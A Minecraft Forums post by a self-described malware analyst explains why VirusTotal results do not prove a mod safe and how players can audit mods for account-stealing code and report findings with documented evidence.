Curse
MMO-Champion
WowStead
Arena Junkies
Minecraft Forums
DarthHater
Diablo Fans
Terraria Online
0
What makes me such and expert on malware?
I reverse engineer malware for a living and while that may sound cool it’s mostly staring at x86 assembly code in IDA Pro for 40 hours a week and writing reports, but hey it's in high demand and the pay is great.
There is something I see often on this forum that makes me shake my head each time I read it. Time and time again I see people submitting some new mod to Virustotal or a similar service and then declaring that it’s safe based on the results.
The flaw in this is that even if the mod has malicious routines Virustotal won’t detect it.
You’re probably thinking that it has to be safe when it get scanned by all those engines right?
Wrong!
They key to that answer being that antivirus engines aside from a few that also do behavioral based detection rely on signatures to do their detection. That signature, a fingerprint for a piece of code, is based on a unique pattern found within a file. If no one has created a signature for a piece of malware then outside of behavioral detection which looks for anomalous behavior such as a program trying to inject it’s code into Internet Explorer, a driver, or trying to monitor the keyboard when it’s window isn’t focused.
The problem is a good coder can find ways around behavioral detection, and it’s trivial to rearrange a binary to alter it’s fingerprint with polymorphic substitutions. Think of a deck of cards as a representation of a file. When you copy that file the deck is always in the same order. If you create a signature for this file it’s going to rely on the order the cards are in. In simplified terms polymorphic code means the deck is reshuffled each time. It still does the same thing but the signature has changed. Antivirus is only going to detect malware that’s wide spread enough to have been detected and had signatures created.
So how does this apply to mods?
The mods are Java and outside of an exploit to affect the system outside of the Java virtual machine (which happens from time to time so keep your Java updated) they’re contained to the running program, Minecraft. This creates problems when you rely on antivirus which can see Java running but can’t look inside of the Java virtual machine, so unless there’s a piece of code that’s had a fingerprint created (very rare for Java) and is caught when the file is checked when it’s opened there isn’t going to be an antivirus alert.
The biggest threat as to malicious mods is account theft. If someone can code a mod then the class handling the login authentication can be modified too and unless you’ve got some quality Java reverse engineering tools with their hooks in the running code it’s rather hard to detect. There are other malicious things that can be done too such as deleting your saves, but I’ll focus on account theft for the moment.
The simplest way to determine if a mod has malicious routines is to audit the source. If it’s creating it’s own network connections it’s fairly suspect to begin with as there is no good reason any legitimate mod should be doing so unless the mod is specifically designed to do so and openly states that it does. A mod should never interact with login authentication no matter what justification the author tries to give.
If you don’t know how to read code then you step past static analysis and go into the world of dynamic analysis, aka running it and seeing what it does. The only network connections Java should create when Minecraft is running is one to authenticate with minecraft.net and one to the server you’re playing on if you’re doing SMP. There’s a number of tools to do this but the one I’ll mention is Process Monitor from Sysinternals. It’s a Microsoft tool you can get from Technet and while it has a learning curve you can filter it down to the Java instance Minecraft is running in and to network connections only.
Sysinternals Process Tools page
If you ever come across a windows executable in a mod download just delete it even if it doesn’t pop on Virustotal.
The big question is how to maintain the safety of people downloading mods from the forums.
The biggest safety net will always be a system of peer review by trusted individuals. This is assisted by authors posting their source code. I know some will be hostile to that request but minecraft can be decompiled, modified, and recompiled rather easily and so can your mod. Is it really that painful to add another bit.ly link and get extra clicks? That’s not to say that someone doing a review should only look at the source. They need to focus on the decompiled code but having the original as a reference for comparison is helpful.
You found a malicious mod!?! OMG flame the thread!
Uh... no
If you discover something that makes you think a mod is malicious the proper response is a well documented one so others can review what you’ve found and confirm or disprove it. Starting a flame war on the mod thread isn’t going to do anything constructive. It’s the administrators and moderators’ jobs to police the forum, not yours.
In a post describing what you found you should include a brief summary at the top followed by your findings with references to what tools you used, code snippets referenced to the file and line numbers, and other supporting information including hash values of all the files referenced including hash of the original files you downloaded and the source link.
At the end of this include a link to your analysis material in a zip archive that should contain:
- A text file containing your analysis steps and tools used so others can follow your process.
- The original files you downloaded in their own directory
- The decompiled source you examined in it’s own directory if any
- A text file with file names and MD5 hashes of all included files.
- Screenshots of the post you downloaded the mod from will help if the author changes the links.
This may seem like a lot but it’s purpose is to support the integrity of the contained items. You’re essentially documenting evidence for a case to ban someone or possibly the start of legal action by someone against the author.
